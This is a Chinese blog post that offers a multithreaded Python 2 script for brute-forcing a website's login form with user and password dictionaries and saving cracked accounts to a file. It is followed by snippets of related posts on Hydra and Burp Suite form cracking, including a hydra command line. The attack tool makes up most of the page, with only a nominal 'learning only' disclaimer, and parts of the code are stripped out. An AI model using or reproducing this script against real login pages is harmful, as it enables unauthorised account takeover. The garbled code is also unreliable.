python爬蟲爆破web表單

2021-08-14 03:37:47 字數 2376 閱讀 4954

# -*- coding: utf-8 -*-

#利用python 寫的多執行緒爆破後台使用者名稱+密碼(自備字典),比較實用,即使是在資訊保安這麼重視的今天,

#還是有人不加驗證碼或者異常訪問限制之類的登陸驗證方式,這樣就很容易被弱口令爆破工具拿下,

#(本**僅限學習實用,禁止進行web攻擊,不承擔法律責任)

"referer":""};# referer:是**的訪問**位址

# lock = threading.lock()

def tryuser(user,password):

#print user,password

global headers

global outfile

conn = httplib.httpconnection("www.***xx.com") # 遠端網域名稱

if len(user) < 3: # 限制使用者名稱長度,排除字典中的無用資料

return # 主動退出執行緒

else:

#lock.acquire() # 多執行緒操作檔案,提前加鎖,用後釋放

#line = infile.readline()

#userdata = line.strip().split(' # ') # strip() 預設去除空白字元包括' ','\t','\n'等

#lock.release()

user = user.strip()

passwd = password.strip()

params = urllib.urlencode()

conn.request(method="post", url="/users/login", body=params, headers=headers) # 後台路徑

responsetext = conn.getresponse().read().decode('utf8') # 網頁編碼

#print responsetext # 第一次可以列印看看是否解析

if not responsetext.find(u'使用者名稱或者密碼不正確,請重新輸入!') > 0 :

print '----- find user:', user, 'with password:', passwd, '-----'

outfile.write(user + ' ' + passwd + '\n')

return

outfile = open('accounts-cracked.txt', 'w')

if __name__ == '__main__':

tsk= # 建立執行緒池

with open(r'user.dic', 'r') as fuser:

# 使用with as 來開啟檔案,不需自己關閉檔案,因為他會自己在合適的時候自已關閉(類似c# 中的using(...){}介面)

with open(r'pass.dic', 'r') as fpass:

for user in fuser.readlines():

for password in fpass.readlines():

t= threading.thread(target = tryuser,args=(user,password))

t.daemon = false # 設定不進行程序守護

fpass.seek(0)

# 記住這裡要將檔案重新移到檔案首,不然就會出現只執行外層迴圈的第一條,因為內層在

# 迭代之後(readlines()是迭代器的形式,迭代一次後檔案指標就指到檔案尾了,迭代器

# 也是end了)第二次就沒有password 在 fpass中,也就是說 for password in fpass.readlines():

# 為空,所以這裡的內層迴圈就不會被執行了,因此也就是迭代器清零的問題(c ++ itertor 常有)

# join()無引數就是完全阻塞主線程,等待執行緒執行完 有引數就是說,

# 在主線程等待一秒後就不阻塞執行緒了,繼續執行主線程,這裡的意思是一秒鐘開乙個執行緒

# 不能再thread start之前呼叫join(), 因為join() 是執行緒執行時排程

for t in tsk:

t.start()

t.join(1)

print "all thread ok,maybe not "

outfile.close()

使用Hydra爆破表單

部落格位址 github kali linux web靶機 github傳送門 靶機表單內容如下 表單截圖 假設網域名稱為host.com,表單路徑為 pikachu vul burteforce bf form.php 執行命令如下 hydra l admin p root rockyou.txt...

Web暴力破解 前端JS表單加密進行爆破

0x01 前言 常見的js實現加密的方式有 md5 base64 shal,寫了乙個簡單的demo作為測試。0x02 login.html 提交表單,進行抓包,可以發現密碼字段密碼進行了加密處理 0x03 web暴力猜解 方式一 burp suite 使用intruder進行暴力猜解,intrude...

WEB入門 爆破21 28

web21 首先嘗試 後台常見登陸的弱口令,發現錯誤 則使用burp suite抓包試試看 通過分析,在未填入賬號密碼時,響應頭如下所示 填入弱口令賬號密碼,發現響應頭如下 則對應可知賬號密碼被加密為base64文字,則可通過burpsuite的爆破模組進行對密碼的爆破,字典選用題目附件中的後台常見...